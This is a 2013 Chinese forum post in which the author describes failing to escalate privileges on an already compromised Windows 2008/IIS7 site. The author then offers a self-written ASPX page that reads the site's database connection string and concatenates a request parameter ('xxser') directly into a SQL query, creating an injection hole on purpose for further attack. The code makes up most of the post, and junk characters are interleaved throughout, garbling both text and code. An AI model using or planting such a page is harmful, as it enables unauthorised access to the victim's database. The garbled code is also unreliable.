昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。/ N6 t# u( E2 L
其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。
w* s* b* d* S代码量不多,自己写个拉倒了。烦死了。
7 {8 ?8 @# }2 a
) Y& V5 g5 d( G9 Q4 v
' f/ [8 L& _5 ~8 l, J9 ^/ V. Z<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">8 ]) C/ K! O( K
<html xmlns="http://www.w3.org/1999/xhtml">% Y4 h8 G) B: W* A& V+ \
<head runat="server">
/ _! ]: z' D1 L/ ]* | <title>暗影aspx构造注射专用页面</title>8 n: R# a' R N% }) R
</head>5 G+ h) E7 F1 R. G. o
<body>
( M9 `5 ]" h% N: u% o9 `/ F. T5 ^ <form id="form1" runat="server">* c8 b& I O6 N, d, K1 \8 ?
<div>
( _" _6 a6 R) K; O( E: ^4 U <script language="c#" runat="server">$ g5 u; p) t4 c, f
% z% {# |: f2 o2 \5 ^5 Z l, O C+ a
void page_init(object sender, EventArgs e)8 l" A. r9 A/ [! u. a- ?+ ?" ~
{
6 U% f1 w7 v) C* d. f# |
. u7 [: C* L7 I" Q& _! e4 Z System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
4 y) R' T! m: g6 |& Q( ]3 W + ]) T0 {, q8 v6 Q+ X
conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();* s H7 H. B/ s; \! {
conn.Open();' C) R8 c7 l3 Y( f- K
, y: M' c$ ^+ [' b: ] string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=17 [* F. v$ Y+ s
; c* k3 j8 V% k6 V& d0 x) g+ |) V$ J
System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);7 H6 c% c; b- c$ N! g( H
int x = command.ExecuteNonQuery();! @/ w- }9 v! u0 U- ^8 a
Response.Write(i+"\n");
2 @: N0 ~. P; }4 y% m9 d Response.Write(x);5 _0 T& W9 T }( @. V
conn.Close();
0 w. Z# z5 f2 Z( \; W) n }" f" k8 X/ o* s3 X# x) K
* v! } i/ E2 D& ? </script>6 T; g3 V8 R: \5 H) r9 Z: o% p
</div>
9 y8 m) x3 T K; J1 O </form>
+ d- D8 N2 i# y</body>6 o0 B$ w9 ?0 Q
</html>; Z( {. |3 W2 T0 R: X# c
|
发表于 2013-3-20 21:32:01
收藏
支持
反对